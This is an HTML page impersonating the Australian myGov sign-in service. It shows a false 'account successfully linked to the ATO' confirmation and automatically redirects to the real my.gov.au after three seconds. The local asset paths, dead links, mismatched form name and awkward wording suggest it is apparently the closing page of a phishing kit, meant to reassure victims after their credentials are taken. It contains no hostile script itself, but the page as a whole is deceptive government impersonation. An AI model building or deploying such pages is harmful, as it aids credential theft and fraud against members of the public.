<!DOCTYPE html>
<html lang="en">
   <head>
      <meta http-equiv="refresh" content="3; url=https://my.gov.au/">
      <meta charset="utf-8">
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      <meta name="apple-mobile-web-app-capable" content="yes">
      <title>Sign in with myGov - myGov</title>
      <meta name="description" content="">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <meta name="format-detection" content="telephone=no">
      <link rel="icon" type="image/png" sizes="16x16" href="favicon.ico">
      <link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700|Roboto:300,400,500,700,900&amp;display=swap" rel="stylesheet">
      <link href="css/mgv2-application.css" rel="stylesheet">
      <link href="css/blugov.css" rel="stylesheet">
   </head>
   <body>
      <div class="brand-rainbow">&nbsp;</div>
      <header role="banner" class="mgvEnhanceHeader">
         <section class="wrapper">
            <div class="inner">
               <div class="unauth-grid">
                  <div class="unauth-grid-row">
                     <a class="unauth-govt-crest__link">
                     <img id="unauth-govt-crest" src="images/myGov-cobranded-logo-black.svg" alt="myGov Beta" role="img">
                     </a>
                  </div>
               </div>
            </div>
         </section>
      </header>
      <div class="wrapper-mapwap">
         <div class="main-block" id="content" role="main">
            <form id="forgotten-username-form" action="/" method="post">
               <center>
                  <br><br><?xml version="1.0" encoding="utf-8"?>
                  <svg version="1.1" width="70" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve">
                     <g>
                        <path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"/>
                     </g>
                  </svg>
                  <p></p>
                  <h4 class="page-toolbar__page-title first-page-element" data-id="page-title" no-margin="" no-padding="" text-center="" role="heading" aria-label="Verified Successfully" style="color:rgb(0, 75, 133); padding-left: 25px">Your account has been successfully linked properly to the ATO</h4>
               </center>
            </form>
         </div>
      </div>
      <footer role="contentinfo">
         <div class="wrapper">
            <div class="inner">
               <section class="footer-list">
                  <nav>
                     <h2 class="sr-only" aria-label="Footer">Footer</h2>
                     <ul class="lower-links">
                        <li>
                           <a target="_blank">Terms of use</a>
                        </li>
                        <li>
                           <a target="_blank">Privacy and security</a>
                        </li>
                        <li>
                           <a target="_blank">Copyright</a>
                        </li>
                        <li>
                           <a target="_blank">Accessibility</a>
                        </li>
                     </ul>
                  </nav>
               </section>
               <div class="footer-lower">
                  <section class="footer-lower-logo">
                     <a>
                     <img src="images/myGov-cobranded-logo-white.svg" alt="myGov Beta" width="313.17" height="70" role="img">
                     </a>
                  </section>
                  <p class="footer-acknowledgement">We acknowledge the Traditional Custodians of the lands we live on. We pay our respects to all Elders, past and present, of all Aboriginal and Torres Strait Islander nations.</p>
               </div>
            </div>
         </div>
      </footer>
   </body>
</html>